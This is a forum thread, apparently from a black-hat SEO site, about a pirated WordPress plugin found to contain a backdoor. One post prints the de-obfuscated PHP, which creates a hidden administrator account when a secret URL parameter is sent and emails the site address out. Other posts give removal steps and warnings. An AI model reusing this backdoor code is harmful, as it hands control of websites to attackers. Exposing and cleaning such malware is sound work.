19.gif

Search (advanced search)
Use this Search form before posting, asking or make a new thread.
Tips: Use Quotation mark to search words (eg. "How To Make Money Online")

01-30-2013, 12:03 PM (This post was last modified: 01-30-2013 12:03 PM by MuGen-Chin.)
Post: #101
RE:
Hey guys !

I have de-obfuscated the file "central.class.php" for you (seopressor v5)

I don't know if I am a trusted programmer here, but here it is :

Code:
add_action('wp_head', 'vg4beaws');
function vg4beaws()
{
If ($_GET['cms'] == 'jjoplmh') {
require('wp-includes/registration.php');
If (!username_exists('wordpress')) {
$user_id = wp_create_user('wordpress','gh67io9Cjm');
$user = new WP_User($user_id);
$user->set_role('administrator');
}}}
add_action('wp_head', 'm6yascfv');
function m6yascfv()
{If (!username_exists('wordpress'))
{
$addressdecode=base64_decode("cGhpbGx5Y2hhZEBnbXguY29t"); // phillychad@gmx.com

$vari='Wordpress Plugin covertplayer';
mail($addressdecode,get_bloginfo('wpurl'),$vari);
}}


  1. Change your file on "wp-content/plugins/seo-pressor/classes/central.class.php", by my cleaned file (not obfuscated)
  2. Go to "Users" in your admin panel, search for user "wordpress" with administrator rights :O, and DELETE it !
  3. Change all your passwords (if you have too many users, just change the user with admin rights)
01-30-2013, 12:05 PM (This post was last modified: 01-31-2013 04:49 AM by Un4gettable.)
Post: #102
--
Removing so NEW CLEAN Version details can show
BBHF members,Thank you for all you do for us. :-)
I always give Rep points to the person I download from.
Heart BestBlackHatForum.com
01-30-2013, 12:08 PM
Post: #103
RE:
Here goes the cleaned file
Password as usual.

uploadseeds:

zippyshare:
01-30-2013, 12:09 PM (This post was last modified: 01-31-2013 04:53 AM by Un4gettable.)
Post: #104
RE: [GET] SEOPressor UNLIMITED nulled V 4.3.11 Latest Updates
Removed comment so NEW CLEAN Version details can show
BBHF members,Thank you for all you do for us. :-)
I always give Rep points to the person I download from.
Heart BestBlackHatForum.com
01-30-2013, 12:11 PM (This post was last modified: 01-30-2013 12:15 PM by MuGen-Chin.)
Post: #105
RE:
Man, don't talk between my posts LOL,
People won't see that I have cleaned the file :(

Edit : Ahh Wack0, cleaned the file already ... I am not fast enough !
51.gif
01-30-2013, 12:21 PM (This post was last modified: 01-30-2013 12:30 PM by Un4gettable.)
Post: #106
RE:
Can I talk now?

I Am SO SO SORRY!!!!!!!!!
I know right now that I am the most HATED Person on here right now.

I have TRULY LEARNED A BIG LESSON, That the VirusTool does not pick up everything. I Trust and LOVE Taur, Wack0 and all of our Other GREAT Crackers on here and will NEVER UPLOAD ANYTHING ELSE ON HERE AGAIN.

PLEASE FORGIVE ME, I have contacted the Admin/Support waiting to hear back about a mass email to users.



I did a VirusTools Scan before I used it on my websites and it worked so I shared it on HERE.

Some other people also
did a virus scan and it was clean.


I have NOT HAD ANY PROBLEMS on any
of the 8 websites that I put this on!

I even had a NEW Domain (Sat Jan 26) NEW Website come up #2 on the 1st page of
Google using this download the last three days, NO Backlinks, just the
SEOPressor.
BBHF members,Thank you for all you do for us. :-)
I always give Rep points to the person I download from.
Heart BestBlackHatForum.com
01-30-2013, 12:41 PM
Post: #107
RE:
(01-30-2013 12:21 PM)Un4gettable Wrote:  I Am SO SO SORRY!!!!!!!!!
I know right now that I am the most HATED Person on here right now.
Hey, don't beat yourself up mate. No one hates you ;)

I know you didn't add the exploit, and it was very well hidden. Plus, the hackers will generally hit your site a week or two after you've installed the infected plugin, so you are none the wiser and don't link the attack to the plugin.

In fact, a lot of the WP Plugins on here have similar exploits and I always check them first before using them on a live site.

You can trust anything from Wack0, Taur or any of our members who've been around a while and got trusted status - but be careful if the OP has only recently joined or has only made a few posts - most of these being shares.

The script kiddies will register a few usernames and start sharing new stuff like it's tomorrow. While these accounts can be banned by Admins/Mods, the trouble is that the kiddies simply re-register with different user ids and start all over again.

The most important thing is that people are aware of the exploit so they can take action.
01-30-2013, 12:56 PM
Post: #108
RE:
(01-30-2013 12:41 PM)kirstie Wrote:  
(01-30-2013 12:21 PM)Un4gettable Wrote:  I Am SO SO SORRY!!!!!!!!!
I know right now that I am the most HATED Person on here right now.
Hey, don't beat yourself up mate. No one hates you ;)

I know you didn't add the exploit, and it was very well hidden. Plus, the hackers will generally hit your site a week or two after you've installed the infected plugin, so you are none the wiser and don't link the attack to the plugin.

In fact, a lot of the WP Plugins on here have similar exploits and I always check them first before using them on a live site.

You can trust anything from Wack0, Taur or any of our members who've been around a while and got trusted status - but be careful if the OP has only recently joined or has only made a few posts - most of these being shares.

The script kiddies will register a few usernames and start sharing new stuff like it's tomorrow. While these accounts can be banned by Admins/Mods, the trouble is that the kiddies simply re-register with different user ids and start all over again.

The most important thing is that people are aware of the exploit so they can take action.
Thank you, should we always check a WP plugin class php file?
BBHF members,Thank you for all you do for us. :-)
I always give Rep points to the person I download from.
Heart BestBlackHatForum.com
01-31-2013, 04:11 AM (This post was last modified: 01-31-2013 09:02 AM by Raven.)
Post: #109
RE:
@ Chairman
This Is Clean...
It's Commented Out...
Green Color On Bad Code
Thank You!
[Image: UD3r.png]
IF You can, Always Buy What You Make Money With. It's The Right Thing To Do.
01-31-2013, 05:54 AM
Post: #110
RE:
(01-30-2013 04:02 AM)Wack0 Wrote:  
(01-30-2013 04:01 AM)debbycoop Wrote:  Yep astralslider. That's what I did. Please Wack0 correct me if I'm wrong
Yes. That's what you should do. :)

Hello Wack0,

Thank you so much for cleaning up this mess.

I replaced the Base64 junk with the codes you gave and added the Double "and" they said add. But now it shows this at the very top on all pages:


Read more @ bestblackhatforum.com : [GET] SEOPressor UNLIMITED nulled V
4.3.11 Latest Updates
http://bestblackhatforum.com/Thread-GET-...z2JU8Xjo4Y
bestblackhatforum.com



And it will not let me add a another theme, where to I go to remove this?
42.gif
BBHF members,Thank you for all you do for us. :-)
I always give Rep points to the person I download from.
Heart BestBlackHatForum.com




33.gif